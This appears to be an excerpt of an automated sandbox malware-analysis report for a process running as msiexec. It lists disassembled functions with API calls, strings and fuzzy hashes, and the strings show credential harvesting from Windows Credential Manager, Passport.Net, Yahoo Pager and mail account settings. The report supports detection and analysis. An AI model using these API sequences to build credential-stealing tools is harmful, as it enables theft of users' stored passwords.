                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                    • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                    • String ID:
                                                    • API String ID: 19018683-0
                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                    APIs
                                                    • memset.MSVCRT ref: 0040644F
                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID:
                                                    • API String ID: 438689982-0
                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                    APIs
                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                    • strlen.MSVCRT ref: 0040F7BE
                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                    • String ID: Passport.Net\*
                                                    • API String ID: 2329438634-3671122194
                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                    APIs
                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                    • memset.MSVCRT ref: 0040330B
                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                    • strchr.MSVCRT ref: 0040335A
                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                    • strlen.MSVCRT ref: 0040339C
                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                    • String ID: Personalities
                                                    • API String ID: 2103853322-4287407858
                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: H
                                                    • API String ID: 2221118986-2852464175
                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                    • API String ID: 3510742995-3170954634
                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID: winWrite1$winWrite2
                                                    • API String ID: 438689982-3457389245
                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: winRead
                                                    • API String ID: 1297977491-2759563040
                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                    APIs
                                                    • memset.MSVCRT ref: 0044955B
                                                    • memset.MSVCRT ref: 0044956B
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: gj
                                                    • API String ID: 1297977491-4203073231
                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                    APIs
                                                    • memset.MSVCRT ref: 00444573
                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: QueryValuememset
                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID$`{ h
                                                    • API String ID: 3363972335-2996423930
                                                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004090C2
                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$ClientParentPoints
                                                    • String ID:
                                                    • API String ID: 4247780290-0
                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                    APIs
                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                    • String ID:
                                                    • API String ID: 2775283111-0
                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                    • API String ID: 885266447-2471937615
                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                    APIs
                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strcmpi$_mbscpy
                                                    • String ID: smtp
                                                    • API String ID: 2625860049-60245459
                                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                    APIs
                                                    • memset.MSVCRT ref: 0040C28C
                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FocusMessagePostmemset
                                                    • String ID: S_@$l
                                                    • API String ID: 3436799508-4018740455
                                                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                    APIs
                                                    • memset.MSVCRT ref: 004092C0
                                                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                    • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                    Strings
                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileString_mbscpymemset
                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                    • API String ID: 408644273-3424043681
                                                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy
                                                    • String ID: C^@$X$ini
                                                    • API String ID: 714388716-917056472
                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                    APIs
                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                    • String ID: MS Sans Serif
                                                    • API String ID: 3492281209-168460110
                                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ClassName_strcmpimemset
                                                    • String ID: edit
                                                    • API String ID: 275601554-2167791130
                                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: strlen$_mbscat
                                                    • String ID: 3CD
                                                    • API String ID: 3951308622-1938365332
                                                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: rows deleted
                                                    • API String ID: 2221118986-571615504
                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                    APIs
                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$memset
                                                    • String ID:
                                                    • API String ID: 1860491036-0
                                                    • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                    • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                    APIs
                                                    • memset.MSVCRT ref: 0040D2C2
                                                    • memset.MSVCRT ref: 0040D2D8
                                                    • memset.MSVCRT ref: 0040D2EA
                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                    • memset.MSVCRT ref: 0040D319
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$memcpy
                                                    • String ID:
                                                    • API String ID: 368790112-0
